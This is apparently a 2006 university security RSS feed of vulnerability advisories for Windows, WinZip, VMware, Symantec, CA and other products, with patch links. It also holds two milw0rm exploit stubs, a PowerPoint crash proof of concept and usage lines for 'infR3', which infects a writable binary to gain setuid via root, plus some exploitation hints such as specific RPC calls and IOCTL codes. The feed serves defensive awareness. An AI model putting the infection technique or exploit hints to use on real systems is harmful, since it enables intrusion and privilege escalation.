This feed is hosted by the Office of Information Security for the University of Pennsylvania. We will post advisories in this feed that seem to possibly have an impact on University of Pennsylvania Students,Staff and Faculty. Urgent advisories will be posted to the appropriate University mailing lists as well. http://www.upenn.edu/computing/security 2006 University of Pennsylvania Mon, 20 Nov 2006 10:45:37 -0500 security@isc.upenn.edu Mon, 20 Nov 2006 10:45:33 -0500 FeedForAll Mac v1.6 (1.6.0.8) Release Date: 2006-11-16

Critical:
Highly critical
Impact: Security Bypass
Cross Site Scripting
Privilege escalation
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: SGI Advanced Linux Environment 3


CVE reference: CVE-2005-3011 (Secunia mirror)
CVE-2006-4574 (Secunia mirror)
CVE-2006-4805 (Secunia mirror)
CVE-2006-4810 (Secunia mirror)
CVE-2006-4811 (Secunia mirror)
CVE-2006-5462 (Secunia mirror)
CVE-2006-5463 (Secunia mirror)
CVE-2006-5464 (Secunia mirror)
CVE-2006-5465 (Secunia mirror)
CVE-2006-5467 (Secunia mirror)
CVE-2006-5468 (Secunia mirror)
CVE-2006-5469 (Secunia mirror)
CVE-2006-5740 (Secunia mirror)
CVE-2006-5747 (Secunia mirror)
CVE-2006-5748 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
SGI has issued a patch for SGI Advanced Linux Environment. This fixes some vulnerabilities, which can be exploited by malicious, local users to perform certain actions with escalated privileges, and by malicious people to bypass certain security restrictions, conduct cross-site scripting attacks, to cause a DoS (Denial of Service), or potentially to compromise a vulnerable system.

For more information:
SA13123
SA16816
SA22380
SA22590
SA22653
SA22722

Solution:
Apply patch 10345 for SGI ProPack 3 Service Pack 6.
http://support.sgi.com/

Original Advisory:
ftp://patches.sgi.com/support/free/security/advisories/20061101-01-P.asc

Other References:
SA13123:
http://secunia.com/advisories/13123/

SA16816:
http://secunia.com/advisories/16816/

SA22380:
http://secunia.com/advisories/22380/

SA22590:
http://secunia.com/advisories/22590/

SA22653:
http://secunia.com/advisories/22653/

SA22722:
http://secunia.com/advisories/22722/



]]> http://secunia.com/advisories/22929/ Mon, 20 Nov 2006 10:43:56 -0500 Release Date: 2006-11-15

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: WinZip 10.x

CVE reference: CVE-2006-5198 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
A vulnerability has been reported in WinZip, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to several unspecified insecure methods in the FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61). This can be exploited to execute arbitrary code via a specially crafted web site.

Successful exploitation requires that the user is tricked into visiting a malicious web site.

The vulnerability is reported in WinZip 10.0 versions prior to Build 7245.

Solution:
Update to version 10.0 Build 7245.

Provided and/or discovered by:
Discovered by an anonymous person and reported via ZDI.

Original Advisory:
WinZip:
http://www.winzip.com/wz7245.htm

ZDI:
http://www.zerodayinitiative.com/advisories/ZDI-06-040.html
]]> http://secunia.com/advisories/22891/ Wed, 15 Nov 2006 14:57:34 -0500 Release Date: 2006-11-14

Critical:
Moderately critical
Impact: DoS
System access
Where: From local network
Solution Status: Vendor Patch

OS: Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

CVE reference: CVE-2006-4688 (Secunia mirror)
CVE-2006-4689 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Two vulnerabilities have been reported in Microsoft Windows, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.

1) A boundary error in Client Service for Netware (CSNW) can be exploited to cause a buffer overflow via a specially crafted network message sent to the system.

Successful exploitation allows execution of arbitrary code.

2) An unspecified error in Client Service for Netware can be exploited to cause the system to stop responding via a specially crafted network message.

Solution:
Apply patches.

Microsoft Windows 2000 SP4:
http://www.microsoft.com/downloads/de...=3cf0b0d1-ff07-40ac-a6ac-44dc4a54f91e

Microsoft Windows XP SP2:
http://www.microsoft.com/downloads/de...=2f54258f-1071-467b-80a2-e4dbfc050667

Microsoft Windows Server 2003 (optionally with SP1):
http://www.microsoft.com/downloads/de...=f23574f7-4033-45ac-8ad8-6cced2ee9285

Provided and/or discovered by:
1) The vendor credits Peter Winter-Smith of NGS Software and Sam Arun Raj of McAfee.
2) The vendor credits Sam Arun Raj of McAfee.

Original Advisory:
MS06-066 (KB923980):
http://www.microsoft.com/technet/security/Bulletin/MS06-066.mspx


]]> http://secunia.com/advisories/22866/ Wed, 15 Nov 2006 14:56:50 -0500 Release Date: 2006-11-14

Critical:
Moderately critical
Impact: Security Bypass
Exposure of sensitive information
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: VMware ESX Server 2.x

CVE reference: CAN-2004-2069 (Secunia mirror)
CVE-2005-2177 (Secunia mirror)
CVE-2005-2491 (Secunia mirror)
CVE-2006-1056 (Secunia mirror)
CVE-2006-1342 (Secunia mirror)
CVE-2006-1343 (Secunia mirror)
CVE-2006-1864 (Secunia mirror)
CVE-2006-2071 (Secunia mirror)
CVE-2006-3403 (Secunia mirror)
CVE-2006-3467 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Some vulnerabilities, security issues, and a weakness have been reported in VMware ESX Server, which can be exploited by malicious, local users to bypass certain security restrictions and disclose potentially sensitive information, or by malicious people to cause a DoS (Denial of Service) and potentially compromise a vulnerable system.

For more information:
SA15930
SA16793
SA19357
SA19657
SA19724
SA19869
SA20100
SA20980

This also fixes a security issue is OpenSSH, which is caused due to an error in signaling child processes to terminate after the LoginGraceTime period has expired. This may be exploited to cause a DoS by preventing the daemon from accepting new connections.

Solution:
VMware ESX Server 2.0.2:
Apply Upgrade Patch 2

VMware ESX Server 2.1.3:
Apply Upgrade Patch 2

VMware ESX Server 2.5.3:
Apply Upgrade Patch 4 (do not apply this patch to SunFire X4100 or X4200 servers).

VMware ESX Server 2.5.4:
Apply Upgrade Patch 1

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.vmware.com/download/esx/esx-253-200610-patch.html
http://www.vmware.com/download/esx/esx-254-200610-patch.html
http://www.vmware.com/download/esx/esx-213-200610-patch.html
http://www.vmware.com/download/esx/esx-202-200610-patch.html

Other References:
SA15930:
http://secunia.com/advisories/15930/

SA16793:
http://secunia.com/advisories/16793/

SA19357:
http://secunia.com/advisories/19357/

SA19657:
http://secunia.com/advisories/19657/

SA19724:
http://secunia.com/advisories/19724/

SA19869:
http://secunia.com/advisories/19869/

SA20100:
http://secunia.com/advisories/20100/

SA20980:
http://secunia.com/advisories/20980/


]]> http://secunia.com/advisories/22875/ Wed, 15 Nov 2006 14:56:07 -0500 Release Date: 2006-11-14
Last Update: 2006-11-15

Critical:
Moderately critical
Impact: System access
Where: From local network
Solution Status: Vendor Patch

OS: Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

CVE reference: CVE-2006-4691 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
eEye Digital Security has reported a vulnerability in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error in the Workstation Service (wkssvc.dll) within the "NetpManageIPCConnect()" function. This can be exploited to cause a buffer overflow via a specially crafted message sent to the system.

This can e.g. be exploited via a NetrJoinDomain2 RPC call with an overly long MachineName in the second argument.

Successful exploitation allows execution of arbitrary code, but requires Administrator privileges on Windows XP SP2.

Solution:
Apply patches.

Microsoft Windows 2000 SP4:
http://www.microsoft.com/downloads/de...=3ad5c57d-d3f6-46a1-8dee-3e16d0977f80

Microsoft Windows XP SP2:
http://www.microsoft.com/downloads/de...=f4c8e767-4ed2-4e36-aa43-612f3017efc7

Provided and/or discovered by:
JeongWook Matt Oh, eEye Digital Security.

Changelog:
2006-11-15: Added additional information from eEye Digital Security.

Original Advisory:
MS06-070 (KB924270):
http://www.microsoft.com/technet/security/Bulletin/MS06-070.mspx

eEye Digital Security:
http://research.eeye.com/html/advisories/published/AD20061114.html


]]> http://secunia.com/advisories/22883/ Wed, 15 Nov 2006 14:55:35 -0500 Release Date: 2006-11-14

Critical:
Highly critical
Impact: Security Bypass
System access
Where: From remote
Solution Status: Vendor Patch

OS: Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

CVE reference: CVE-2006-3014 (Secunia mirror)
CVE-2006-3311 (Secunia mirror)
CVE-2006-3587 (Secunia mirror)
CVE-2006-3588 (Secunia mirror)
CVE-2006-4640 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Microsoft has acknowledged some vulnerabilities in Windows XP, which can be exploited by malicious people to bypass certain security restrictions or compromise a user's system.

The vulnerabilities are caused due to the use of a vulnerable version of Adobe Flash Player.

For more information:
SA20971
SA21865

Solution:
Apply patches.

Microsoft Windows XP SP2:
http://www.microsoft.com/downloads/de...=93208e57-5f14-4fb2-bc0c-2c4f3c56274a

Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/de...=93208e57-5f14-4fb2-bc0c-2c4f3c56274a

Original Advisory:
MS06-069 (KB923789):
http://www.microsoft.com/technet/security/Bulletin/MS06-069.mspx

Other References:
SA20971:
http://secunia.com/advisories/20971/

SA21865:
http://secunia.com/advisories/21865/]]> http://secunia.com/advisories/22882/ Wed, 15 Nov 2006 14:55:01 -0500 Release Date: 2006-11-14
Last Update: 2006-11-15

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

OS: Microsoft Windows 2000 Advanced Server
Microsoft Windows 2000 Datacenter Server
Microsoft Windows 2000 Professional
Microsoft Windows 2000 Server
Microsoft Windows Server 2003 Datacenter Edition
Microsoft Windows Server 2003 Enterprise Edition
Microsoft Windows Server 2003 Standard Edition
Microsoft Windows Server 2003 Web Edition
Microsoft Windows XP Home Edition
Microsoft Windows XP Professional

CVE reference: CVE-2006-3445 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
A vulnerability has been reported in Microsoft Windows, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to an unspecified error in the Microsoft Agent ActiveX control when processing .ACF files. This can be exploited to cause a buffer overflow via a specially crafted .ACF file.

Successful exploitation allows execution of arbitrary code when e.g. a malicious website is visited with Internet Explorer.

Solution:
Apply patches.

Microsoft Windows 2000 SP4:
http://www.microsoft.com/downloads/de...=c72ceec8-3e4d-4281-8183-11b724693217

Microsoft Windows XP SP2:
http://www.microsoft.com/downloads/de...=c16e1607-f396-4113-89f6-1fe89ec54b6a

Microsoft Windows XP Professional x64 Edition:
http://www.microsoft.com/downloads/de...=b4002a2a-b03e-4428-a26a-84293270d149

Microsoft Windows Server 2003 (optionally with SP1):
http://www.microsoft.com/downloads/de...=8f1a3f85-830b-4662-a4cc-8dff9f59acea

Microsoft Windows Server 2003 for Itanium-based systems (optionally with SP1):
http://www.microsoft.com/downloads/de...=b528f61d-ad54-4bad-b9a0-b650385de216

Microsoft Windows Server 2003 x64 Edition:
http://www.microsoft.com/downloads/de...=3da7ff4a-2389-4ce4-a6bb-b7e02f646b74

Provided and/or discovered by:
Reported by the vendor.

Changelog:
2006-11-15: Added US-CERT reference.

Original Advisory:
MS06-068 (KB920213):
http://www.microsoft.com/technet/security/Bulletin/MS06-068.mspx

Other References:
US-CERT VU#810772:
http://www.kb.cert.org/vuls/id/810772
]]> http://secunia.com/advisories/22878/ Wed, 15 Nov 2006 14:54:22 -0500
#PPT 0day poc
#
#OFFICE 2003 full Patch
#
#3001afbc 8b01 mov eax,[ecx] ds:0023:00000000=????????
#3001afbe 56 push esi
#3001afbf ff5014 call dword ptr [eax+0x14]
#try control ecx.............:P
#Maybe can Exploit
#
#
#nanika@chroot.org
#naninb@gmail.com
#www.chroot.org]]> http://milw0rm.com/exploits/2523 Thu, 12 Oct 2006 14:16:56 -0400 Release Date: 2006-10-11

Critical:
Moderately critical
Impact: Unknown
Security Bypass
Exposure of sensitive information
Where: From remote
Solution Status: Vendor Patch

Software: IBM WebSphere Application Server 6.1.x

CVE reference: CVE-2006-4223 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Some vulnerabilities have been reported in IBM WebSphere Application Server, which can be exploited by malicious people to gain knowledge of potentially sensitive information or gain unautorised access.

1) An unspecified error can be exploited to disclose the contents of JSP files.

2) An error in the WSN security allows access when no user credentials (username/password) are supplied.

3) An unspecified error may result in "possible security exposure".

Solution:
Apply version 6.1.0 Fix Pack 2 (6.1.0.2).
http://www-1.ibm.com/support/docview.wss?rs=180&uid=swg24013142

Provided and/or discovered by:
Reported by the vendor.]]> http://secunia.com/advisories/22372/ Thu, 12 Oct 2006 14:15:39 -0400 Release Date: 2006-10-12

Critical:
Moderately critical
Impact: Cross Site Scripting
DoS
System access
Where: From remote
Solution Status: Vendor Patch

OS: Sun Solaris 10

CVE reference: CVE-2005-3352 (Secunia mirror)
CVE-2005-3357 (Secunia mirror)
CVE-2006-3747 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Sun has issued an update for Apache 2. This fixes some vulnerabilities, which can be exploited by malicious people to conduct cross-site scripting attacks, cause a DoS (Denial of Service), and potentially compromise a vulnerable system.

For more information:
SA18008
SA18307
SA21197

The vulnerability has been reported in Sun Solaris 10 for both the x86 and SPARC platform.

Solution:
Apply patches.

Sun Solaris 10 for SPARC:
Apply patch 120543-06 or later.
http://sunsolve.sun.com/search/docume...setkey=urn:cds:docid:1-21-120543-06-1

Sun Solaris 10 for x86:
Apply patch 120544-06 or later.
http://sunsolve.sun.com/search/docume...setkey=urn:cds:docid:1-21-120544-06-1

Original Advisory:
http://sunsolve.sun.com/search/document.do?assetkey=1-26-102662-1

Other References:
SA18008:
http://secunia.com/advisories/18008/

SA18307:
http://secunia.com/advisories/18307/

SA21197:
http://secunia.com/advisories/21197/
]]> http://secunia.com/advisories/22368/ Thu, 12 Oct 2006 14:15:10 -0400 # gcc infR3.s -o infR3<br> # strip infR3<br> # find a writable binary (example: ls)<br> # ./infR3 /bin/ls<br> # when root calls the writable ls, chmod will be setuided<br> # Coded by jolmos@7a69ezine.org == sha0@BadCheckSum.com<br><br> http://www.milw0rm.com/exploits/2492 Mon, 09 Oct 2006 10:01:31 -0400 Release Date: 2006-10-06

Critical:
Less critical
Impact: Privilege escalation
Where: Local system
Solution Status: Vendor Patch

Software: Symantec AntiVirus Corporate Edition 10.x
Symantec AntiVirus Corporate Edition 8.x
Symantec AntiVirus Corporate Edition 9.x
Symantec AntiVirus for Blue Coat Security
Symantec AntiVirus for CacheFlow Security Gateway
Symantec AntiVirus for Clearswift 4.x
Symantec AntiVirus for Inktomi Traffic Edge
Symantec AntiVirus for Microsoft ISA Server 4.x
Symantec AntiVirus for Microsoft SharePoint 4.x
Symantec AntiVirus for NetApp Filer/NetCache
Symantec AntiVirus Scan Engine 4.x
Symantec Brightmail AntiSpam 4.x
Symantec Brightmail AntiSpam 5.x
Symantec Brightmail AntiSpam 6.x
Symantec Client Security 1.x
Symantec Client Security 2.x
Symantec Client Security 3.x
Symantec Mail Security for Domino 4.x
Symantec Mail Security for Domino 5.x
Symantec Mail Security for Exchange 4.x
Symantec Mail Security for Microsoft Exchange 5.x
Symantec Mail Security for SMTP 4.x
Symantec Norton AntiVirus 2001
Symantec Norton AntiVirus 2002
Symantec Norton AntiVirus 2003
Symantec Norton AntiVirus 2004
Symantec Norton AntiVirus 2005
Symantec Norton AntiVirus 2006
Symantec Norton AntiVirus Corporate Edition 7.x
Symantec Norton Internet Security 2001
Symantec Norton Internet Security 2002
Symantec Norton Internet Security 2003
Symantec Norton Internet Security 2003 Professional
Symantec Norton Internet Security 2004
Symantec Norton Internet Security 2004 Professional
Symantec Norton Internet Security 2005
Symantec Norton Internet Security 2006
Symantec Norton SystemWorks 2001
Symantec Norton SystemWorks 2002
Symantec Norton SystemWorks 2003
Symantec Norton SystemWorks 2004
Symantec Norton SystemWorks 2005
Symantec Norton SystemWorks 2006
Symantec Web Security 2.x
Symantec Web Security 3.x

CVE reference: CVE-2006-4927 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
A vulnerability has been reported in various Symantec Products, which can be exploited by malicious, local users to gain escalated privileges.

The vulnerability is caused due to insufficient address space verification within the IOCTL handlers of the NAVEX15.SYS and NAVENG.SYS device drivers, which allows to overwrite arbitrary memory with a constant double word value. This can be exploited to execute arbitrary code with kernel privileges by sending specially crafted I/O Request Packets to the 0x222AD3, 0x222AD7, and 0x222ADB IOCTL handlers.

The vulnerability has been reported in all versions of the following products for Windows NT, Windows 2000, and Windows XP:
- Norton AntiVirus
- Norton Internet Security
- Norton System Works
- Symantec AntiVirus Corporate Edition
- Symantec AntiVirus for Blue Coat Security
- Symantec AntiVirus for CacheFlow Security Gateway
- Symantec AntiVirus for Clearswift MIME Sweeper
- Symantec AntiVirus for Inktomi Traffic Edge
- Symantec AntiVirus for Microsoft ISA Server
- Symantec AntiVirus for NetApp Filer/NetCache
- Symantec BrightMail AntiSpam
- Symantec Client Security
- Symantec Mail Security for Domino
- Symantec Mail Security for Exchange
- Symantec Mail Security for SMTP
- Symantec Scan Engine
- Symantec Web Security for Windows

Solution:
Update to the virus definitions of October 4, 2006 revision 9 or later.

Provided and/or discovered by:
Rubén Santamarta, reversemode.com.

Original Advisory:
Symantec:
http://securityresponse.symantec.com/avcenter/security/Content/2006.10.05a.html

iDEFENSE:
http://www.idefense.com/intelligence/vulnerabilities/display.php?id=417


]]> http://secunia.com/advisories/22288/ Mon, 09 Oct 2006 09:41:57 -0400 Release Date: 2006-10-06

Critical:
Moderately critical
Impact: System access
Where: From local network
Solution Status: Vendor Patch

Software: BrightStor ARCserve Backup 11.x
BrightStor ARCserve Backup 11.x (for Windows)
BrightStor ARCserve Backup 9.x
BrightStor Enterprise Backup 10.x
CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2
CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2
CA Business Protection Suite r2
CA Server Protection Suite r2

CVE reference: CVE-2006-5143 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Some vulnerabilities have been reported in various CA products, which can be exploited by malicious people to compromise a vulnerable system.

1) Some boundary errors exist within RPC routines in the Backup Agent RPC Server (DBASRV.exe), which can be exploited to cause stack-based buffer overflows and allow arbitrary code execution.

2) A boundary error exists in ASBRDCST.DLL when processing Discovery Service communication. This can be exploited to cause a stack-based buffer overflow and allows execution of arbitrary code.

3) Two boundary errors exist within RPC routines in ASCORE.dll, used by the Message Engine RPC Server. These can be exploited to cause a heap-based buffer overflow and a stack-based buffer overflow by passing an overly long string as the second parameter, and allow arbitrary code execution.

The following products for the Windows platform are affected:
* BrightStor ARCserve Backup r11.5 SP1 and below (SP2 is not affected)
* BrightStor ARCserve Backup r11.1
* BrightStor ARCserve Backup for Windows r11
* BrightStor Enterprise Backup 10.5
* BrightStor ARCserve Backup v9.01
* CA Server Protection Suite r2
* CA Business Protection Suite r2
* CA Business Protection Suite for Microsoft Small Business Server Standard Edition r2
* CA Business Protection Suite for Microsoft Small Business Server Premium Edition r2

Solution:
Update to the latest version.
http://supportconnect.ca.com

Provided and/or discovered by:
1) Pedram Amini, TippingPoint Security Research Team
2,3) livesploit.com

Original Advisory:
1) TippingPoint:
http://www.tippingpoint.com/security/advisories/TSRT-06-11.html

2,3) Zero Day Initiative:
http://www.zerodayinitiative.com/advisories/ZDI-06-030.html
http://www.zerodayinitiative.com/advisories/ZDI-06-031.html

CA:
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp
]]> http://secunia.com/advisories/22285/ Mon, 09 Oct 2006 09:41:05 -0400 Release Date: 2006-10-06

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: Serv-U FTP Server 6.x

CVE reference: CVE-2006-2937 (Secunia mirror)
CVE-2006-2940 (Secunia mirror)
CVE-2006-3738 (Secunia mirror)
CVE-2006-4343 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Some vulnerabilities have been reported in Serv-U FTP Server, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

The vulnerability is caused due to the use of a vulnerable version of OpenSSL.

For more information:
SA22130

Solution:
Update to version 6.3.0.1.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://www.serv-u.com/releasenotes/

Other References:
SA22130:
http://secunia.com/advisories/22130/]]> http://secunia.com/advisories/22284/ Mon, 09 Oct 2006 09:40:35 -0400 Release Date: 2006-10-06

Critical:
Moderately critical
Impact: System access
Where: From local network
Solution Status: Vendor Patch

Software: BrightStor ARCserve Backup 11.x

CVE reference: CVE-2006-5142 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Pedram Amini has reported a vulnerability in BrightStor ARCserver Backup, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error within the handling of long messages received over the "CheyenneDS" Mailslot. This can be exploited to cause a stack-based buffer overflow by sending an overly long message.

The vulnerability has been reported in version R11.5. Prior versions may also be affected.

Solution:
Update to the latest version.
http://supportconnect.ca.com

Provided and/or discovered by:
Pedram Amini, TippingPoint Security Research Team.

Original Advisory:
TippingPoint:
http://www.tippingpoint.com/security/advisories/TSRT-06-12.html

CA:
http://supportconnectw.ca.com/public/storage/infodocs/basbr-secnotice.asp]]> http://secunia.com/advisories/22283/ Mon, 09 Oct 2006 09:40:06 -0400 Release Date: 2006-10-06

Critical:
Moderately critical
Impact: DoS
Where: From remote
Solution Status: Vendor Patch

OS: Linux Kernel 2.6.x

CVE reference: CVE-2006-3741 (Secunia mirror)
CVE-2006-4997 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Some vulnerabilities have been reported in the Linux Kernel, which can be exploited by malicious, local users and malicious people to cause a DoS (Denial of Service).

1) The "sys_perfmon()" function on Itanium (IA64) systems does not correctly handle file descriptor reference counts, which can be exploited to cause a DoS by consuming all available file descriptors.

2) The "clip_mkip()" function in net/atm/clip.c may dereference a previously freed pointer when processing received data, which can be exploited to cause a kernel panic.

Solution:
Update to version 2.6.18.

Provided and/or discovered by:
1) Reported by the vendor.
2) ADLab, Venustech info Ltd CHINA.

Original Advisory:
http://www.kernel.org/git/?p=linux/ke...44d00762703e1b6146fce12ce2684885f8bf6
http://www.kernel.org/git/?p=linux/ke...6109a9dfd9327fdbe630fc819e1b7450986b2
]]> http://secunia.com/advisories/22279/ Mon, 09 Oct 2006 09:39:21 -0400 Release Date: 2006-10-06

Critical:
Less critical
Impact: Exposure of system information
System access
Where: From remote
Solution Status: Vendor Patch

Software: Symantec Automated Support Assistant
Symantec Norton AntiVirus 2005
Symantec Norton AntiVirus 2006
Symantec Norton Internet Security 2005
Symantec Norton Internet Security 2006
Symantec Norton SystemWorks 2005
Symantec Norton SystemWorks 2006

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Some vulnerabilities have been reported in Support Tool ActiveX Control included in various Symantec products, which potentially can be exploited by malicious people to disclose system information or to compromise a vulnerable system.

1) An unspecified input validation error exists, which can be exploited to gain unauthorized access to system information.

2) An unspecified boundary error exist, which can be exploited to cause a stack-based buffer overflow and may allow execution of arbitrary code with privileges of the user running the browser.

Successful exploitation requires spoofing of a trusted domain web site and to trick the user to click on a malicious link.

The following products are affected:
* Symantec Automated Support Assistant
* Symantec Norton AntiVirus 2005, 2006
* Symantec Norton Internet Security 2005, 2006
* Symantec Norton SystemWorks 2005, 2006

Solution:
Norton AntiVirus, Norton Internet Security, Norton System Works:
Apply latest updates via LiveUpdate.

Automated Support Assistant:
Update to the latest version.
https://www-secure.symantec.com/techsupp/asa/install.jsp

Provided and/or discovered by:
The vendor credits John Haesman, Next Generation Security Research.

Original Advisory:
http://securityresponse.symantec.com/avcenter/security/Content/2006.10.05.html]]> http://secunia.com/advisories/22228/ Mon, 09 Oct 2006 09:38:44 -0400 Release Date: 2006-10-05

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

OS: Xerox WorkCentre
Xerox WorkCentre Pro

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
A vulnerability has been reported in Xerox WorkCentre Pro and Xerox WorkCentre, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is due to an unspecified error in WebUI, which can be exploited to inject and execute arbitrary commands.

The vulnerabilities affect the following products:
* WorkCentre 232, 238, 245, 255, 265, 275
* WorkCentre Pro 232, 238, 245, 255, 265, 275

Solution:
See patch matrix in vendor advisory to apply patch P29.
http://www.xerox.com/downloads/usa/en/c/cert_P29_WC2xx-Only_HTTP.zip

Provided and/or discovered by:
The vendor credits Brendan O'Connor.

Original Advisory:
http://www.xerox.com/downloads/usa/en/c/cert_XRX06_005.pdf]]> http://secunia.com/advisories/22252/ Mon, 09 Oct 2006 09:37:56 -0400 Release Date: 2006-10-04

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Unpatched

Software: IBM Rational RequisitePro 2003.x

This advisory is currently marked as unpatched!
- Companies can be alerted when a patch is released!


Description:
IBM has acknowledged a vulnerability in Rational RequisitePro RequisiteWeb, which can be exploited by malicious people to cause a DoS (Denial of Service) or to compromise a vulnerable system.

For more information:
SA9886

Solution:
Upgrade to version 7.0.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
IBM:
http://www-1.ibm.com/support/docview.wss?uid=swg21247112

Other References:
SA9886:
http://secunia.com/advisories/9886/


]]> http://secunia.com/advisories/22249/ Mon, 09 Oct 2006 09:37:17 -0400 Release Date: 2006-10-04

Critical:
Moderately critical
Impact: Exposure of system information
Exposure of sensitive information
Where: From remote
Solution Status: Vendor Patch

Software: CA Unicenter Web Services Distributed Management 3.x

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
A vulnerability has been reported in CA Unicenter Web Services Distributed Management (WSDM), which can be exploited by malicious people to disclose sensitive information.

The vulnerability is caused due to an error within the included Jetty WebServer, which does not correctly check path names in HTTP requests. This can be exploited to access arbitrary files on a vulnerable system via directory traversal attacks.

The vulnerability has been reported in versions prior to version 3.11. Other versions may also be affected.

Note: This vulnerability may be related to:
SA7178

Solution:
Update to WSDM 3.11 or later.

Provided and/or discovered by:
Oliver Karow and Richard Sammet, Symantec

Original Advisory:
http://lists.grok.org.uk/pipermail/full-disclosure/2006-October/049846.html

Other References:
SA7178:
http://secunia.com/advisories/7178/]]> http://secunia.com/advisories/22229/ Mon, 09 Oct 2006 09:36:44 -0400 Release Date: 2006-10-04

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: Kolab Server 2.x

CVE reference: CAN-2006-2937 (Secunia mirror)
CAN-2006-2940 (Secunia mirror)
CAN-2006-3738 (Secunia mirror)
CAN-2006-4343 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Some vulnerabilities have been reported in Kolab Server, which can be exploited by malicious people to cause a DoS (Denial of Service) and compromise a vulnerable system.

For more information:
SA22130

Solution:
Follow the vendor's instructions to update your system.
http://kolab.org/security/kolab-vendor-notice-11.txt

Original Advisory:
http://kolab.org/security/kolab-vendor-notice-11.txt

Other References:
SA22130:
http://secunia.com/advisories/22130/
]]> http://secunia.com/advisories/22216/ Mon, 09 Oct 2006 09:36:22 -0400 Release Date: 2006-10-03

Critical:
Highly critical
Impact: System access
Where: From remote
Solution Status: Vendor Patch

Software: Skype for Mac 1.x

CVE reference: CVE-2006-5084 (Secunia mirror)

Want to know the next time vulnerabilities are fixed in this product?
- Companies can be alerted via email and SMS!


Description:
Tom Ferris has reported a vulnerability in Skype for Mac, which potentially can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a format string error within the handling of URI arguments and can be exploited via a specially crafted Skype URL containing format specifiers.

Successful exploitation may allow execution of arbitrary code.

The vulnerability affects versions 1.5.*.79 and prior.

Solution:
Update to version 1.5.0.80.
http://www.skype.com/download/

Provided and/or discovered by:
Tom Ferris

Original Advisory:
Skype:
http://www.skype.com/security/skype-sb-2006-002.html]]> http://secunia.com/advisories/22185/ Tue, 03 Oct 2006 15:50:13 -0400 Release Date: 2006-10-02

Critical:
Highly critical
Impact: DoS
System access
Where: From remote
Solution Status: Vendor Patch

Software: OpenVPN 2.x

CVE reference: CVE-2006-2937 (Secunia mirror)
CVE-2006-2940 (Secunia mirror)
CVE-2006-3738 (Secunia mirror)
CVE-2006-4343 (Secunia mirror)


Description:
Some vulnerabilities have been reported in OpenVPN, which can be exploited by malicious people to cause a DoS (Denial of Service) or potentially compromise a vulnerable system.

The OpenVPN Windows Installer prior to 2.0.9 includes vulnerable versions of the OpenSSL DLL files.

For more information:
SA22130

Solution:
Update to version 2.0.9.

Provided and/or discovered by:
Reported by the vendor.

Original Advisory:
http://openvpn.net/changelog.html

Other References:
SA21846:
